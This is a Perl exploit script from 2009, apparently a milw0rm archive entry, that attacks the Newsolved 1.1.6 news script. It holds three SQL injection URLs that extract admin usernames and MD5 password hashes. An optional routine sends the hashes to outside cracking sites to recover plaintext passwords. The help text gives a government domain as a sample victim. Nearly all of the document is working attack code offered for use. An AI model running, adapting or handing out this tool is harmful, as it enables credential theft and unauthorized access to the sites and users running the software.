#!/usr/bin/perl -w
# Neversolved.pl
#
# Copyright (c) 2009 by <jmp-esp.net>
#
# A simple login grabber
# by lama - 06/23/2009
#
# Tested on: Newsolved 1.1.6
use strict;
use LWP::UserAgent;
use Getopt::Std;
use vars qw/ %opt /;
getopts( "i:p:u:lfh", \%opt );
my @bugs =
(
[
"newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE"
."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok",
"monat_num=1:(.*?):([a-f0-9]{32})"
],
[
"newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw"
."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
"([^>]+):([a-f0-9]{32})<"
],
[
"newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3,"
."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
"<i>(.*?):([a-f0-9]{32})<\/i>"
]
);
my @lookups =
(
[
'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search',
'',
'<div id="result" >(.*?)</div>'
],
[
'http://milw0rm.com/cracker/search.php',
'hash=[HASH]&Submit=Submit',
'>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>'
],
[
'http://securitystats.com/tools/hashcrack.php',
'inputhash=[HASH]&type=MD5&Submit=Submit',
'<BR>[a-f0-9]{32} = (.*?)</td>'
],
[
'http://md5decrypter.com/index.php',
'hash=[HASH]&submit=Decrypt',
'<b class=\'red\'>Normal Text: </b>(.*?)\n'
]
);
sub isHost
{
my $target = shift;
if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ )
{
my $host = $1;
my $folder = ( $2 ? $2 : '/' );
if ( $folder !~ /\/$/ )
{
$folder .= '/';
}
return "http://$host$folder";
}
else
{
return 0;
}
}
sub replacePlaceholder
{
my $search = shift;
my $replace = shift;
my $placeholder = shift;
$search=~s/\[$placeholder\]/$replace/g;
return $search;
}
sub isVulnerable
{
my $target = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('GET', $target);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /mysql_fetch_object/)
{
return 1;
}
elsif (!($body =~ /styles_output\.css/))
{
return 0;
}
else
{
return -1;
}
}
sub getHash
{
my $target = shift;
my $regexp = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('GET', $target);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /$regexp/)
{
return ($1, $2);
}
else
{
return 0;
}
}
sub searchPlaintext
{
my $hash = shift;
foreach (@lookups)
{
my $server = replacePlaceholder(@$_[0], $hash, "HASH");
my $post = replacePlaceholder(@$_[1], $hash, "HASH");
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('POST', $server);
$request->content("$post");
$request->content_type('application/x-www-form-urlencoded');
$request->header('Referer' => $server);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /@$_[2]/)
{
return $1;
}
}
return 0;
}
sub attackTarget
{
my $target = shift;
my $userid = shift;
foreach (@bugs)
{
my $bug = @$_[0];
$bug = replacePlaceholder($bug, $userid, "USERID");
$bug = replacePlaceholder($bug, $opt{p}, "PREFIX");
(my $username, my $password) = getHash($target.$bug, @$_[1]);
if (($username) && ($password))
{
return ($username, $password);
}
}
return 0;
}
sub showHelp
{
print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n"
. "Usage: $0 [options] Victim\n"
. "OPTIONS\n"
. " -i integer: Userid [1]\n"
. " -u string: Useragent [IE]\n"
. " -p string: Prefix [newsolved]\n"
. " -f: Force [optional]\n"
. " -l: Lookup [optional]\n"
. " -h: Help [optional]\n"
. "EXAMPLES\n"
. " ./$0 http://pentagon.gov/news/\n"
. " ./$0 -f -i 4 http://omnomnom.com/\n"
. "OTHER\n"
. " Magic_Quotes_GPC needs to be off\n";
}
sub showBanner
{
print " __ \n"
. " |__|.--------.-----.______.-----.-----.-----.\n"
. " | || | _ |______| -__|__ --| _ |\n"
. " | ||__|__|__| __| |_____|_____| __|\n"
. "|___| |__| lama 06/23/2009 |__| \n"
. "Kampfgeschrei!\n\n";
}
if ($opt{h})
{
showHelp();
exit;
}
my $victim = shift;
if (!($victim) || !($victim = isHost($victim)))
{
showHelp();
exit;
}
$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u});
$opt{i} = '1' if (!$opt{i});
$opt{p} = 'newsolved' if (!$opt{p});
if (scalar(@bugs) < 1)
{
print "Bugs or gtfo. Srsly.\n";
exit;
}
my $vulnerability = isVulnerable($victim.$bugs[0][0]);
if ($vulnerability == 0)
{
print "This doesn't look like Newsolved. Read the help, now.\n\n";
showHelp();
exit if (!$opt{f});
}
elsif ($vulnerability == -1)
{
print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n";
showHelp();
exit if (!$opt{f});
}
showBanner();
(my $username, my $password) = attackTarget($victim, $opt{i});
if ($username)
{
print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n";
print "Username:\t$username\nPassword:\t$password\n";
if ($opt{l})
{
my $cleartext = searchPlaintext($password);
if ($cleartext)
{
print "Cleartext:\t$cleartext\n";
}
else
{
print "Cleartext:\tNot found\n";
}
}
}
else
{
print "Unable to retrieve the password: Is the userid correct?\n";
}
# milw0rm.com [2009-06-29]